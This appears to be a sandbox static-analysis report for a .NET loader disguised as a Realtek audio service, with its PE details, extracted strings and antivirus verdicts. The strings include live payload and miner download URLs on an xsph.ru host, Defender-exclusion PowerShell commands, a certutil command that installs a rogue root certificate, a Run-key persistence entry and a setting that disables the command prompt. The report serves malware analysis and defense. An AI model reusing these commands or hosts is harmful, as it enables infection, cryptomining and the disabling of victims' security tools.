popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

PE Compile Time

2098-08-24 02:53:22

PDB Path

C:\Work\Sources1\Loader\Loader\obj\Debug\Loader.pdb

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x0000189c 0x00001a00 4.73875814989
.rsrc 0x00004000 0x00000498 0x00000600 2.68585802664
.reloc 0x00006000 0x0000000c 0x00000200 0.0815394123432

Resources

Name Offset Size Language Sub-language File type
RT_VERSION 0x00004058 0x0000043c LANG_NEUTRAL SUBLANG_NEUTRAL data

Imports

Library mscoree.dll:
0x402000 _CorExeMain
!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Microsoft.Win32
<Module>
System.IO
mscorlib
RegistryValueKind
DownloadFile
set_FileName
System.Net.Mime
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
SetValue
Loader.exe
System.Runtime.Versioning
ToString
Program
System
get_Location
System.Reflection
set_StartInfo
ProcessStartInfo
DirectoryInfo
Loader
CurrentUser
set_RedirectStandardError
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
MediaTypeNames
Process
set_Arguments
Exists
Concat
Object
System.Net
WebClient
set_RedirectStandardOutput
set_CreateNoWindow
OpenSubKey
RegistryKey
GetExecutingAssembly
CreateDirectory
GetCurrentDirectory
Registry
WrapNonExceptionThrows
"Realtek HD Audio Universal Service
Realtek Semiconductor
52022 (c) Realtek Semiconductor. All rights reserved.
$6538d43b-cc54-4fb6-95d9-c31675ca5a7a
1.1.490.1
.NETFramework,Version=v4.7.2
FrameworkDisplayName
.NET Framework 4.7.2
C:\Work\Sources1\Loader\Loader\obj\Debug\Loader.pdb
_CorExeMain
mscoree.dll
0&1$0"
Realtek Semiconductor Corp.0
240220121134Z
250220123134Z0&1$0"
Realtek Semiconductor Corp.0
0:0&1$0"
Realtek Semiconductor Corp.
FIw0qe
20240222185413Z
DigiCert, Inc.1;09
2DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA0
230714000000Z
341013235959Z0H1
DigiCert, Inc.1 0
DigiCert Timestamp 20230
Ihttp://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
http://ocsp.digicert.com0X
Lhttp://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
l2|X/gGe
(f*^[0
DigiCert Inc1
www.digicert.com1!0
DigiCert Trusted Root G40
220323000000Z
370322235959Z0c1
DigiCert, Inc.1;09
2DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA0
http://ocsp.digicert.com0A
5http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
2http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
DigiCert Inc1
www.digicert.com1$0"
DigiCert Assured ID Root CA0
220801000000Z
311109235959Z0b1
DigiCert Inc1
www.digicert.com1!0
DigiCert Trusted Root G40
]J<0"0i3
v=Y]Bv
http://ocsp.digicert.com0C
7http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
4http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
~qj#k"
DigiCert, Inc.1;09
2DigiCert Trusted G4 RSA4096 SHA256 TimeStamping CA
240222185413Z0+
/1(0&0$0"
@WhA6o
Fjz R)
yaLLvy;${
C:\ProgramData\Microsoft\Diagnosis\
Microsoft.ServiceHub.Control.exe
Microsoft.ServiceHub.Anyns.exe
Microsoft.ServiceHub.Header.exe
Microsoft.ServiceHub.Taskhost.exe
Microsoft.ServiceHub.Runtime.exe
rtt.cer
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
RtkAudUApp64
Software\Policies\Microsoft\Windows\System
DisableCMD
00000000
powershell.exe
powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Control.exe
powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Anyns.exe
powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Header.exe
powershell -Command Add-MpPreference -ExclusionPath
powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Taskhost.exe
powershell -Command Add-MpPreference -ExclusionProcess Microsoft.ServiceHub.Runtime.exe
Sideload\
http://a0920080.xsph.ru/KZ1/control.exe
http://a0920080.xsph.ru/KZ1/asyns.exe
http://a0920080.xsph.ru/KZ1/thost.exe
http://a0920080.xsph.ru/HeaderFinder.exe
http://a0920080.xsph.ru/miner.exe
http://a0920080.xsph.ru/rtt.cer
certutil.exe
-addstore root
Sideload\rtt.cer
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
Realtek HD Audio Universal Service
CompanyName
Realtek Semiconductor
FileDescription
Realtek HD Audio Universal Service
FileVersion
1.1.490.1
InternalName
Loader.exe
LegalCopyright
2022 (c) Realtek Semiconductor. All rights reserved.
LegalTrademarks
OriginalFilename
Loader.exe
ProductName
Realtek HD Audio Universal Service
ProductVersion
1.1.490.1
Assembly Version
1.1.490.1
Antivirus Signature
Bkav W32.AIDetectMalware.CS
Lionic Trojan.Win32.PowerShell.4!c
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh RDN/Generic Downloader.x
ALYac Clean
Cylance unsafe
Zillya Clean
Sangfor Downloader.Msil.Small.Vejl
K7AntiVirus Trojan-Downloader ( 005b31a31 )
Alibaba Trojan:MSIL/PowerShell.979ce496
K7GW Trojan-Downloader ( 005b31a31 )
Cybereason Clean
Baidu Clean
VirIT Trojan.Win32.MSIL_Heur.A
Paloalto Clean
Symantec Trojan.Gen.MBT
Elastic Clean
ESET-NOD32 a variant of MSIL/TrojanDownloader.Small.DCN
APEX Clean
Avast Win32:RATX-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.MSIL.PowerShell.gen
BitDefender Trojan.GenericKD.72035715
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Trojan.GenericKD.72035715
Tencent Malware.Win32.Gencirc.1405c70b
TACHYON Clean
Sophos Mal/Generic-S
F-Secure Trojan.TR/Dldr.Small.rywqk
DrWeb Trojan.DownLoader46.55016
VIPRE Trojan.GenericKD.72035715
TrendMicro Backdoor.Win32.ASYNCRAT.YXECRZ
Trapmine Clean
FireEye Trojan.GenericKD.72035715
Emsisoft Trojan.GenericKD.72035715 (B)
SentinelOne Static AI - Suspicious PE
GData Trojan.GenericKD.72035715
Jiangmin Clean
Webroot W32.Trojan.Msil
Varist W32/ABRisk.XCII-7111
Avira TR/Dldr.Small.rywqk
Antiy-AVL Trojan[Downloader]/MSIL.Small
Kingsoft MSIL.Trojan.PowerShell.gen
Gridinsoft Clean
Xcitium Malware@#p1vpfb3or85r
Arcabit Trojan.Generic.D44B2D83
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.MSIL.PowerShell.gen
Microsoft Trojan:Win32/CoinMiner.N!cl
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee RDN/Generic Downloader.x
MAX malware (ai score=81)
VBA32 Clean
Malwarebytes Trojan.Downloader.BTCM
Panda Trj/Chgt.AD
Zoner Clean
TrendMicro-HouseCall Backdoor.Win32.ASYNCRAT.YXECRZ
Rising Downloader.Small!8.B41 (CLOUD)
Yandex Clean
Ikarus Trojan-Downloader.MSIL.Small
MaxSecure Clean
Fortinet MSIL/Small.DCN!tr.dldr
BitDefenderTheta Gen:NN.ZemsilF.36802.bm1@aiAd8Kh
AVG Win32:RATX-gen [Trj]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
alibabacloud Trojan[downloader]:MSIL/PowerShell.gen
No IRMA results available.